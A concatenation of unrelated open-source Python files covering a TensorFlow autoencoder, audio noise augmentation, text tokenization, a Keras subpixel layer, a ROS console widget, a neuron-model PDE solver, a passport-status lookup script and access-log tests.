psize, n_channels x_data_node = tf.placeholder(params.TF_DATA_TYPE, name='data') x_data_out_node = tf.placeholder(params.TF_DATA_TYPE, name='data') ksize = params.TF_CONV_KERNEL_SIZE # for weight decay conv_weight_list = [] ######################################################### # Build the encoder ######################################################### layer_name_base = 'encoder' response = x_data_node for l in range(n_convs_encoder): l_type = list_layer_type_encoder[l] layer_name = layer_name_base + '-conv' + str(l) n_feature_prev = list_n_features_encoder[l] n_feature_next = list_n_features_encoder[l + 1] if l_type == 'c' or l_type == 'p': if l_type == 'c': list_stride = [1, 1, 1, 1] pad = 'SAME' else: list_stride = [1, 2, 2, 1] pad = 'SAME' with tf.variable_scope(layer_name): conv_weight = tf.get_variable("weight", shape=[ksize, ksize, n_feature_prev, n_feature_next], initializer=tf.contrib.layers.xavier_initializer_conv2d(), trainable=is_trainable) conv_bias = tf.Variable(tf.zeros([n_feature_next],dtype=params.TF_DATA_TYPE), name='bias', trainable=is_trainable) conv = tf.nn.conv2d(response, conv_weight, strides=list_stride, padding=pad) response = tf.nn.bias_add(conv, conv_bias) if with_wd: conv_weight_list.append(conv_weight) if l == (n_convs_encoder - 1): response = tf.identity(response) else: response = tf.nn.relu(response) else: print('A wrong layer type for the encoder') exit() if l == (n_convs_encoder - 1): response_code = response ######################################################### # Build the decoder ######################################################### layer_name_base = 'decoder' for l in range(n_convs_decoder): l_type = list_layer_type_decoder[l] layer_name = layer_name_base + '-conv' + str(l) n_feature_prev = list_n_features_decoder[l] n_feature_next = list_n_features_decoder[l + 1] if l_type == 'c': list_stride = [1, 1, 1, 1] pad = 'SAME' with tf.variable_scope(layer_name): conv_weight = tf.get_variable("weight", shape=[ksize, ksize, n_feature_prev, n_feature_next], initializer=tf.contrib.layers.xavier_initializer_conv2d(), trainable=is_trainable) conv_bias = tf.Variable(tf.zeros([n_feature_next], dtype=params.TF_DATA_TYPE), name='bias', trainable=is_trainable) conv = tf.nn.conv2d(response, conv_weight, strides=list_stride, padding=pad) response = tf.nn.bias_add(conv, conv_bias) if l == (n_convs_decoder - 1): response = tf.nn.relu(response) else: response = tf.nn.relu(response) if with_wd: conv_weight_list.append(conv_weight) else: print('A wrong layer type for the decoder') exit() x_data_predicted_node = response ######################################################### # define the loss - data term ######################################################### data_loss = tf.reduce_mean(tf.square(x_data_predicted_node - x_data_out_node), name='training_error') training_error = data_loss testing_error = tf.Variable(0.0, name='var_testing_err') ph_testing_error = tf.placeholder(dtype=tf.float32) op_assign_testing_error = tf.assign(testing_error, ph_testing_error) testing_psnr = tf.Variable(0.0, name='var_testing_psnr') ph_testing_psnr = tf.placeholder(dtype=tf.float32) op_assign_testing_psnr = tf.assign(testing_psnr, ph_testing_psnr) ######################################################### # define the loss - weight decay term ######################################################### if with_wd: weight_lambda = params.TF_WEIGHT_DECAY_LAMBDA weight_decay_term\ = weight_lambda * tf.add_n([tf.nn.l2_loss(v) for v in conv_weight_list]) weight_decay_term /= len(conv_weight_list) training_error += weight_decay_term ######################################################### # Add summaries ######################################################### training_error_summary = tf.summary.scalar('training error', training_error) data_loss_summary = tf.summary.scalar('data_loss', data_loss) testing_error_summary = tf.summary.scalar('testing error', testing_error) testing_psnr_summary = tf.summary.scalar('testing psnr', testing_psnr) if with_wd: weight_decay_error_summary = tf.summary.scalar('weight decay error', weight_decay_term) summary_op_weight_decay = tf.summary.merge([weight_decay_error_summary]) ######################################################### # Add saver ######################################################### saver = tf.train.Saver() summary_op_training = tf.summary.merge([training_error_summary]) summary_op_data_loss = tf.summary.merge([data_loss_summary]) summary_op_testing = tf.summary.merge([testing_error_summary]) summary_op_testing_psnr = tf.summary.merge([testing_psnr_summary]) ######################################################### # Return model ######################################################### model = {'x_data_node': x_data_node, 'x_data_out_node': x_data_out_node, 'x_data_predicted_node': x_data_predicted_node, 'code': response_code, 'training_error': training_error, 'data_loss': data_loss, 'ph_testing_error': ph_testing_error, 'op_assign_testing_error': op_assign_testing_error, 'ph_testing_psnr': ph_testing_psnr, 'op_assign_testing_psnr': op_assign_testing_psnr, 'summary_op_training': summary_op_training, 'summary_op_data_loss': summary_op_data_loss, 'summary_op_testing': summary_op_testing, 'summary_op_testing_psnr': summary_op_testing_psnr, 'saver': saver, } if with_wd: model['weight_decay_term'] = weight_decay_term model['summary_op_weight_decay'] = summary_op_weight_decay return model # Copyright (C) 2017 Beijing Didi Infinity Technology and Development Co.,Ltd. # All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """This model adds noise/rir to signal and writes it to file.""" import delta.compat as tf from delta.utils.hparam import HParams from delta.data.frontend.read_wav import ReadWav from delta.data.frontend.add_rir_noise_aecres import Add_rir_noise_aecres from delta.data.frontend.write_wav import WriteWav from delta.data.frontend.base_frontend import BaseFrontend class AddNoiseEndToEnd(BaseFrontend): """ Add a random signal-to-noise ratio noise or impulse response to clean speech, and write it to wavfile. """ def __init__(self, config: dict): super().__init__(config) self.add_noise = Add_rir_noise_aecres(config) self.read_wav = ReadWav(config) self.write_wav = WriteWav(config) @classmethod def params(cls, config=None): """ Set params. :param config: contains ten optional parameters: --sample_rate : Sample frequency of waveform data. (int, default = 16000) --if_add_rir : If true, add rir to audio data. (bool, default = False) --rir_filelist : FileList path of rir.(string, default = 'rirlist.scp') --if_add_noise : If true, add random noise to audio data. (bool, default = False) --snr_min : Minimum SNR adds to signal. (float, default = 0) --snr_max : Maximum SNR adds to signal. (float, default = 30) --noise_filelist : FileList path of noise.(string, default = 'noiselist.scp') --if_add_aecres : If true, add aecres to audio data. (bool, default = False) --aecres_filelist : FileList path of aecres.(string, default = 'aecreslist.scp') --speed : Speed of sample channels wanted. (float, default=1.0) :return: An object of class HParams, which is a set of hyperparameters as name-value pairs. """ sample_rate = 16000 if_add_rir = False rir_filelist = 'rirlist.scp' if_add_noise = False noise_filelist = 'noiselist.scp' snr_min = 0 snr_max = 30 if_add_aecres = False aecres_filelist = 'aecreslist.scp' audio_channels = 1 speed = 1.0 hparams = HParams(cls=cls) hparams.add_hparam('sample_rate', sample_rate) hparams.add_hparam('speed', speed) hparams.add_hparam('if_add_rir', if_add_rir) hparams.add_hparam('if_add_noise', if_add_noise) hparams.add_hparam('rir_filelist', rir_filelist) hparams.add_hparam('noise_filelist', noise_filelist) hparams.add_hparam('snr_min', snr_min) hparams.add_hparam('snr_max', snr_max) hparams.add_hparam('if_add_aecres', if_add_aecres) hparams.add_hparam('aecres_filelist', aecres_filelist) hparams.add_hparam('audio_channels', audio_channels) if config is not None: hparams.override_from_dict(config) return hparams def call(self, in_wavfile, out_wavfile): """ Read a clean wav return a noisy wav. :param in_wavfile: clean wavfile path. :param out_wavfile: noisy wavfile path. :return: write wav opration. """ with tf.name_scope('add_noise_end_to_end'): input_data, sample_rate = self.read_wav(in_wavfile) noisy_data = self.add_noise(input_data, sample_rate) / 32768 write_op = self.write_wav(out_wavfile, noisy_data, sample_rate) return write_op """Text processing methods.""" import allnews_am.tokenizer.tokenizer as tokenizer def tokenize(s): """Tokenizes a string into a sequence of sentences and words. Args: s: The string to tokenize. Returns: A Sequence of sequences, where the top level sequence are sentences and each sentence is a sequence of string tokens. """ s = s.strip() if len(s) > 0 and s[-1] != ':': s += ':' # Required for correct tokenization. t = tokenizer.Tokenizer(s) t.segmentation().tokenization() # Segments are the sentences. # Tokens are the words and punctuation. return [ # There care cases where 'ե՛ւ' would be represented twice, such as # ('1-2', 'ե՛ւ'), (1, 'եւ'), (2, '՛'). Hence, the check for integer as # the first element of the tuple. [t[1] for t in sentence['tokens'] if isinstance(t[0], int)] for sentence in t.segments ] SoyNLP/soynlp/hangle/__init__.py1-10 from ._distance import levenshtein from ._distance import jamo_levenshtein from ._distance import cosine_distance from ._distance import jaccard_distance from ._hangle import normalize from ._hangle import decompose from ._hangle import compose from ._hangle import character_is_korean from ._hangle import character_is_jaum from ._hangle import character_is_moum from ._hangle import to_base from ._hangle import character_is_number from ._hangle import character_is_english from ._hangle import ConvolutionHangleEncoderfrom tensorflow.keras.layers import Layer from tensorflow.keras.utils import get_custom_objects from tensorflow.nn import depth_to_space class SubpixelConv2D(Layer): """ Subpixel Conv2D Layer upsampling a layer from (h, w, c) to (h*r, w*r, c/(r*r)), where r is the scaling factor, default to 4 # Arguments upsampling_factor: the scaling factor # Input shape Arbitrary. Use the keyword argument `input_shape` (tuple of integers, does not include the samples axis) when using this layer as the first layer in a model. # Output shape the second and the third dimension increased by a factor of `upsampling_factor`; the last layer decreased by a factor of `upsampling_factor^2`. # References Real-Time Single Image and Video Super-Resolution Using an Efficient Sub-Pixel Convolutional Neural Network Shi et Al. https://arxiv.org/abs/1609.05158 """ # Code borrowed from: https://github.com/fengwang/subpixel_conv2d def __init__(self, upsampling_factor=4, **kwargs): super(SubpixelConv2D, self).__init__(**kwargs) self.upsampling_factor = upsampling_factor def build(self, input_shape): last_dim = input_shape[-1] factor = self.upsampling_factor * self.upsampling_factor if last_dim % (factor) != 0: raise ValueError('Channel ' + str(last_dim) + ' should be of ' 'integer times of upsampling_factor^2: ' + str(factor) + '.') def call(self, inputs, **kwargs): return depth_to_space( inputs, self.upsampling_factor ) def get_config(self): config = { 'upsampling_factor': self.upsampling_factor, } base_config = super(SubpixelConv2D, self).get_config() return dict(list(base_config.items()) + list(config.items())) def compute_output_shape(self, input_shape): factor = self.upsampling_factor * self.upsampling_factor input_shape_1 = None if input_shape[1] is not None: input_shape_1 = input_shape[1] * self.upsampling_factor input_shape_2 = None if input_shape[2] is not None: input_shape_2 = input_shape[2] * self.upsampling_factor dims = [ input_shape[0], input_shape_1, input_shape_2, int(input_shape[3]/factor) ] return tuple( dims ) get_custom_objects().update({'SubpixelConv2D': SubpixelConv2D}) if __name__ == '__main__': from tensorflow.keras.layers import Input from tensorflow.keras.models import Model, load_model ip = Input(shape=(32, 32, 16)) x = SubpixelConv2D(upsampling_factor=4)(ip) model = Model(ip, x) model.summary() model.save( 'model.h5' ) print( '*'*80 ) nm = load_model( 'model.h5' ) print( 'new model loaded successfully' ) melodic/lib/python2.7/dist-packages/rqt_console/filters/time_filter_widget.py # Software License Agreement (BSD License) # # Copyright (c) 2012, , Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # * Neither the name of , Inc. nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. from datetime import datetime import os import rospkg from python_qt_binding import loadUi from python_qt_binding.QtCore import QDateTime from python_qt_binding.QtWidgets import QWidget class TimeFilterWidget(QWidget): def __init__(self, parentfilter, rospack, time_range_provider): """ Widget for displaying interactive data related to time filtering. :param parentfilter: buddy filter were data is stored, ''TimeFilter'' :param display_list_args: single element list containing one tuple with the min and max time to be displayed, ''list of tuple'' """ super(TimeFilterWidget, self).__init__() ui_file = os.path.join( rospack.get_path('rqt_console'), 'resource/filters', 'time_filter_widget.ui') loadUi(ui_file, self) self.setObjectName('TimeFilterWidget') self._parentfilter = parentfilter # When data is changed it is stored in the parent filter self.start_datetime.dateTimeChanged[QDateTime].connect(self.handle_start_changed) self.stop_datetime.dateTimeChanged[QDateTime].connect(self.handle_stop_changed) self.stop_enabled_check_box.clicked[bool].connect(self.handle_stop_enabled_changed) # Times are passed in unixtimestamp '.' decimal fraction of a second mintime, maxtime = time_range_provider() if mintime != -1: mintime = str(mintime).split('.') maxtime = str(maxtime).split('.') time = QDateTime() time.setTime_t(int(mintime[0])) mintime = time.addMSecs(int(str(mintime[1]).zfill(9)[:3])) self.start_datetime.setDateTime(mintime) time.setTime_t(int(maxtime[0])) maxtime = time.addMSecs(int(str(maxtime[1]).zfill(9)[:3])) self.stop_datetime.setDateTime(maxtime) else: self.start_datetime.setDateTime(datetime.now()) self.stop_datetime.setDateTime(datetime.now()) def handle_start_changed(self, datetime_): self._parentfilter.set_start_time(datetime_) def handle_stop_changed(self, datetime_): self._parentfilter.set_stop_time(datetime_) def handle_stop_enabled_changed(self, checked): self._parentfilter.set_stop_time_enabled(checked) self.stop_datetime.setEnabled(checked) def repopulate(self): """ Stub function. If the widget had any dynamically adjustable data it would requery it in this function. """ pass def save_settings(self, settings): """ Saves the settings for this filter to an ini file. :param settings: used to write the settings to an ini file ''qt_gui.settings.Settings'' """ settings.set_value( 'start_time', self._parentfilter._start_time.toString('hh:mm:ss.zzz (yyyy-MM-dd)')) settings.set_value( 'stop_time', self._parentfilter._stop_time.toString('hh:mm:ss.zzz (yyyy-MM-dd)')) settings.set_value('stop_time_enabled', self._parentfilter._stop_time_enabled) def restore_settings(self, settings): """ Restores the settings for this filter from an ini file. :param settings: used to extract the settings from an ini file ''qt_gui.settings.Settings'' """ self.handle_stop_enabled_changed(settings.value('stop_time_enabled') in [True, 'true']) if settings.contains('start_time'): self.handle_start_changed( QDateTime.fromString(settings.value('start_time'), 'hh:mm:ss.zzz (yyyy-MM-dd)')) else: self.handle_start_changed(QDateTime(datetime.now())) if settings.contains('stop_time'): self.handle_stop_changed( QDateTime.fromString(settings.value('stop_time'), 'hh:mm:ss.zzz (yyyy-MM-dd)')) else: self.handle_stop_changed(QDateTime(datetime.now())) self.stop_datetime.setDateTime(self._parentfilter._stop_time) self.start_datetime.setDateTime(self._parentfilter._start_time) self.stop_enabled_check_box.setChecked(self._parentfilter._stop_time_enabled) tibrewalabhay/molif #!/usr/bin/env python #coding=utf-8 # Copyright 2008 Valentin 'esc' Haenel # # This program is free software. It comes without any warranty, to # the extent permitted by applicable law. You can redistribute it # and/or modify it under the terms of the Do What The Fuck You Want # To Public License, Version 2, as published by Sam Hocevar. See # http://sam.zoy.org/wtfpl/COPYING for more details. from util import * from model import * from integral import FirstPassageInt from numpy import diff, shape, ones, arange, concatenate from scipy import sparse, linsolve class pde_solver(object): def __init__(self,lif,W,V_lb,debug=False): """ compute the density evolution for a lif model Arguments: lif - and instance of lnlif W - the number of intervals to split lif.t_max into V_lb - the lower bound on the voltage discretization debug- when True will output lots of debugging lif provides most of the variables for this function. """ self.lif = lif self.W = W self.V_lb = V_lb self.debug = debug # Lambda is our tridiagonal matrix in each iteration step self.Lambda = sparse.lil_matrix((self.W-1,self.W-1)) # coefficients of the terms in the Fokker-Planck equation self.a = self.lif.sigma**2/2 self.c = self.lif.g self.b = 0 # length of time interval in discretization self.u = self.lif.dt # voltage upper bound self.V_max = self.lif.V_threshold; # voltage lower bound self.V_min = self.V_lb # voltage range self.V_range = self.V_max - self.V_min # lenth of a voltage interval self.w = self.V_range/self.W # mapping of possible values for voltage note: len(V_values) = W self.V_values = arange(self.V_min,self.V_max,self.w) if self.debug: print "V_values: " , self.V_values # this is the index of the value thats closest to V_reset self.V_reset_index = abs(self.V_values - lif.V_reset).argmin() if self.debug: print "V_reset_index" , self.V_reset_index # Lambda * chi = beta self.beta = zeros(W-1) def compute_product_fpt(self): """ compute the product of all fpts for all spike intervals this is the maximum likelihood """ print "computing fpt for all intervals, total: ", \ len(self.lif.spikes) likelihood = 1 for i in xrange(1,len(self.lif.spikes)): if i%10==0 : print "interval: " , i # for each ISI start = self.lif.spikes[i-1] end = self.lif.spikes[i] if self.debug : print "start: ", start print "end:" , end print "spike_times", self.lif.spikes P_vt = self.pde_interval(start,end) likelihood *= self.P_vt_to_fpt(P_vt)[-1] del P_vt return likelihood def P_vt_to_fpt(self,P_vt): """ turn the density evolution into an first passage time Differentiat w.r.t. time the integral w.r.t. Potential """ return concatenate(([0], diff(P_vt.sum(axis=0)) * -1.0)) #@print_timing def pde_interval(self, start, end): """ compute the density evolution for the given interval """ # length of the time interval U = end-start # final density matrix for this interval P_vt = zeros((self.W+1,U)) # set initial value if self.debug : print "W" , self.W print "U" , U print P_vt P_vt[self.V_reset_index,0] = 1 for t in xrange(U-1): # V_rest as defined by lif V_rest = self.lif.V_rest(start+t); # A B and C diagonals of Lambda A = zeros(self.W-2) B = zeros(self.W-1) C = zeros(self.W-2) # now we go and fill the matrix in a,b,c,u,w = self.a, self.b, self.c, self.u, self.w b_array = self.lif.g * (self.V_values[1:-1]/2 -V_rest) #here we scrapped the for loop, yes! #but scrapped readability, no! A[:] = -(2*a*u + b_array[:]*w*u) B[:] = ((4*a*u) - (2*c*w**2*u) + (4*w**2)) C[:]= -(2*a*u - b_array[:]*w*u) self.beta[1:-1] = (2*a*u + b_array[1:]*w*u) * P_vt[3:-1,t] + \ (-4*a*u + 2*c*w**2*u + 4*w**2) * P_vt[2:-2,t] + \ (2*a*u - b_array[:-1]*w*u) * P_vt[1:-3,t] # now we set the diagonals of the tridiagonal matrix self.Lambda.setdiag(A,1) self.Lambda.setdiag(B) self.Lambda.setdiag(C,-1) if self.debug: print "A :" , A print "B :" , B print "C :" , C print "Lambda: " , self.Lambda.todense() print "Lambda22: " , Lambda2.todense() print "beta: " , self.beta chi = linsolve.spsolve(self.Lambda,self.beta) if self.debug: print "chi:" , chi print "sumchi", chi.sum() P_vt[1:-1,t+1] = chi[:] if self.debug: print "P_vt: ", P_vt return P_vt @print_timing def compute_pde_fpt(): """ compute the first passage time using pde""" print "computing partial differential equation based first \ passage time now" lif = lif_setup() p = pde_solver(lif,500,-3.0,debug=False) P_vt = p.pde_interval(0,400) fpt = p.P_vt_to_fpt(P_vt) time = arange(len(fpt))*lif.dt return time, fpt/lif.dt def compute_integral_fpt(): """ compute the first passage time using pde""" print "computing partial differentail equation based first \ passage time now" lif = lif_setup() sigma = lif.sigma current = lif.stim[::5] g_cond = lif.g*ones(len(current)) v_thr = lif.V_threshold V_reset = lif.V_reset dt = lif.dt*5 fpt = FirstPassageInt(g_cond, sigma, current, v_thr, V_reset, dt) print lif.g, sigma, current, v_thr, V_reset time = arange(len(current))*dt return time, fpt if __name__ == '__main__': #compute_pde_fpt() compute_integral_fpt() run.py #!/usr/bin/env python3 """checka a porra toda""" from sys import argv from scrappy import check try: DEST = argv[3] PASSWD = argv[4] except IndexError: DEST = "0" PASSWD = "0" try: CPF = argv[1] PROTO = argv[2] URL = "https://servicos.dpf.gov.br/sinpa/consultarSituacaoSolicitacao.do\ ?dispatcher=consultarSituacaoSolicitacao&protocolo=" + PROTO + "&cpf=" + CPF + "\ &email1=&email2=&url=" check(URL, DEST, PASSWD) except IndexError: print("Usage %s CPF protocol [email passwd]", argv[0]) import json import pathlib import pytest from _pytest.capture import CaptureFixture from spinta.accesslog.file import FileAccessLog from spinta.components import Store from spinta.core.config import RawConfig from spinta.testing.client import create_test_client from spinta.testing.context import create_test_context def _upload_pdf(model, app): resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 data = resp.json() id_ = data['_id'] rev = data['_revision'] resp = app.put(f'/{model}/{id_}/pdf', data=b'BINARYDATA', headers={ 'revision': rev, 'content-type': 'application/pdf', 'content-disposition': 'attachment; filename="test.pdf"', }) assert resp.status_code == 200, resp.text return id_, rev, resp @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_post_accesslog(model, app, context): app.authmodel(model, ['insert']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201, resp.json() accesslog = context.get('accesslog.stream') assert len(accesslog) == 1 assert accesslog[-1] == { 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'method': 'POST', 'url': f'https://testserver/{model}', 'agent': 'testclient', 'rctype': 'application/json', 'format': 'json', 'action': 'insert', 'model': model, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_post_array_accesslog(model, app, context): app.authmodel(model, ['insert']) resp = app.post(f'/{model}', json={ 'status': '42', 'notes': [{ 'note': 'foo', }], }) assert resp.status_code == 201 accesslog = context.get('accesslog.stream') assert len(accesslog) == 1 assert accesslog[-1] == { 'method': 'POST', 'agent': 'testclient', 'rctype': 'application/json', 'format': 'json', 'action': 'insert', 'url': f'https://testserver/{model}', 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_put_accesslog(model, app, context): app.authmodel(model, ['insert', 'update']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 data = resp.json() id_ = data['_id'] rev = data['_revision'] revision = data['_revision'] resp = app.put(f'/{model}/{id_}', json={ 'status': '314', '_revision': revision, }) assert resp.status_code == 200 accesslog = context.get('accesslog.stream') assert len(accesslog) == 2 assert accesslog[-1] == { 'method': 'PUT', 'agent': 'testclient', 'rctype': 'application/json', 'format': 'json', 'action': 'update', 'url': f'https://testserver/{model}/{id_}', 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, 'id': id_, 'rev': rev, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_pdf_put_accesslog(model, app, context): app.authmodel(model, ['insert', 'update', 'pdf_update']) id_, rev, resp = _upload_pdf(model, app) accesslog = context.get('accesslog.stream') assert len(accesslog) == 2 # 2 accesses overall: POST and PUT assert accesslog[-1] == { 'action': 'update', 'agent': 'testclient', 'rctype': 'application/pdf', 'format': 'json', 'method': 'PUT', 'url': f'https://testserver/{model}/{id_}/pdf', 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, 'prop': 'pdf', 'id': id_, 'rev': rev, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_patch_accesslog(model, app, context): app.authmodel(model, ['insert', 'patch']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 data = resp.json() id_ = data['_id'] rev = data['_revision'] resp = app.patch(f'/{model}/{id_}', json={ '_revision': rev, 'status': '13', }) assert resp.status_code == 200 accesslog = context.get('accesslog.stream') assert len(accesslog) == 2 assert accesslog[-1] == { 'agent': 'testclient', 'rctype': 'application/json', 'format': 'json', 'action': 'patch', 'method': 'PATCH', 'url': f'https://testserver/{model}/{id_}', 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, 'id': id_, 'rev': rev, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_get_accesslog(app, model, context): app.authmodel(model, ['insert', 'getone']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 data = resp.json() id_ = data['_id'] resp = app.get(f'/{model}/{id_}') assert resp.status_code == 200 accesslog = context.get('accesslog.stream') assert len(accesslog) == 2 assert accesslog[-1] == { 'agent': 'testclient', 'format': 'json', 'action': 'getone', 'method': 'GET', 'url': f'https://testserver/{model}/{id_}', 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, 'id': id_, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_get_array_accesslog(model, app, context): app.authmodel(model, ['insert', 'getone']) resp = app.post(f'/{model}', json={ 'status': '42', 'notes': [{ 'note': 'foo', }], }) assert resp.status_code == 201 data = resp.json() id_ = data['_id'] app.get(f'/{model}/{id_}') accesslog = context.get('accesslog.stream') assert len(accesslog) == 2 assert accesslog[-1] == { 'agent': 'testclient', 'format': 'json', 'action': 'getone', 'method': 'GET', 'url': f'https://testserver/{model}/{id_}', 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, 'id': id_, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_pdf_get_accesslog(model, app, context): app.authmodel(model, ['insert', 'update', 'pdf_update', 'pdf_getone']) id_, revision, resp = _upload_pdf(model, app) app.get(f'/{model}/{id_}/pdf') accesslog = context.get('accesslog.stream') assert len(accesslog) == 3 # 3 accesses overall: POST, PUT, GET assert accesslog[-1] == { 'format': 'json', 'agent': 'testclient', 'action': 'getone', 'method': 'GET', 'url': f'https://testserver/{model}/{id_}/pdf', 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, 'prop': 'pdf', 'id': id_, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_get_prop_accesslog(app, model, context): app.authmodel(model, ['insert', 'getone']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 data = resp.json() pk = data['_id'] resp = app.get(f'/{model}/{pk}/sync') assert resp.status_code == 200 accesslog = context.get('accesslog.stream') assert len(accesslog) == 2 assert accesslog[-1] == { 'agent': 'testclient', 'format': 'json', 'action': 'getone', 'method': 'GET', 'url': f'https://testserver/{model}/{pk}/sync', 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, 'prop': 'sync', 'id': pk, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_get_w_select_accesslog(app, model, context): app.authmodel(model, ['insert', 'getone']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 data = resp.json() pk = data['_id'] resp = app.get(f'/{model}/{pk}?select(status)') assert resp.status_code == 200 accesslog = context.get('accesslog.stream') assert accesslog[-1] == { 'agent': 'testclient', 'format': 'json', 'action': 'getone', 'method': 'GET', 'url': f'https://testserver/{model}/{pk}?select(status)', 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, 'id': pk, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_getall_accesslog(app, model, context): app.authmodel(model, ['insert', 'getall']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 resp = app.get(f'/{model}') assert resp.status_code == 200 accesslog = context.get('accesslog.stream') assert len(accesslog) == 2 assert accesslog[-1] == { 'agent': 'testclient', 'format': 'json', 'action': 'getall', 'method': 'GET', 'url': f'https://testserver/{model}', 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, } @pytest.mark.models( 'backends/mongo/report', 'backends/postgres/report', ) def test_getall_w_select_accesslog(app, model, context): app.authmodel(model, ['insert', 'getall', 'search']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 resp = app.get(f'/{model}?select(status)') assert resp.status_code == 200 accesslog = context.get('accesslog.stream') assert len(accesslog) == 2 assert accesslog[-1] == { 'agent': 'testclient', 'format': 'json', 'action': 'search', 'method': 'GET', 'url': f'https://testserver/{model}?select(status)', 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, } @pytest.mark.models( 'backends/postgres/report', ) def test_accesslog_file(model, postgresql, rc, request, tmpdir): logfile = pathlib.Path(tmpdir / 'accesslog.log') rc = rc.fork({ 'accesslog': { 'type': 'file', 'file': str(logfile), }, }) context = create_test_context(rc) request.addfinalizer(context.wipe_all) app = create_test_client(context) app.authmodel(model, ['insert']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 accesslog = [json.loads(line) for line in logfile.read_text().splitlines()] assert len(accesslog) == 1 assert accesslog[-1] == { 'agent': 'testclient', 'rctype': 'application/json', 'format': 'json', 'action': 'insert', 'method': 'POST', 'url': f'https://testserver/{model}', 'txn': accesslog[-1]['txn'], 'time': accesslog[-1]['time'], 'client': 'test-client', 'model': model, } @pytest.mark.models( 'backends/postgres/report', ) def test_accesslog_file_dev_null(model, postgresql, rc, request): rc = rc.fork({ 'accesslog': { 'type': 'file', 'file': '/dev/null', }, }) context = create_test_context(rc) request.addfinalizer(context.wipe_all) app = create_test_client(context) app.authmodel(model, ['insert']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 store: Store = context.get('store') assert isinstance(store.accesslog, FileAccessLog) assert store.accesslog.file is None @pytest.mark.models( 'backends/postgres/report', ) def test_accesslog_file_null(model, postgresql, rc, request): rc = rc.fork({ 'accesslog': { 'type': 'file', 'file': 'null', }, }) context = create_test_context(rc) request.addfinalizer(context.wipe_all) app = create_test_client(context) app.authmodel(model, ['insert']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 store: Store = context.get('store') assert isinstance(store.accesslog, FileAccessLog) assert store.accesslog.file is None @pytest.mark.models( 'backends/postgres/report', ) def test_accesslog_file_stdin( model: str, postgresql, rc: RawConfig, request, capsys: CaptureFixture, ): rc = rc.fork({ 'accesslog': { 'type': 'file', 'file': 'stdout', }, }) context = create_test_context(rc) request.addfinalizer(context.wipe_all) app = create_test_client(context) app.authmodel(model, ['insert']) resp = app.post(f'/{model}', json={'status': '42'}) assert resp.status_code == 201 store: Store = context.get('store') assert isinstance(store.accesslog, FileAccessLog) cap = capsys.readouterr() accesslog = [ json.loads(line) for line in cap.out.splitlines() # Skip other lines from 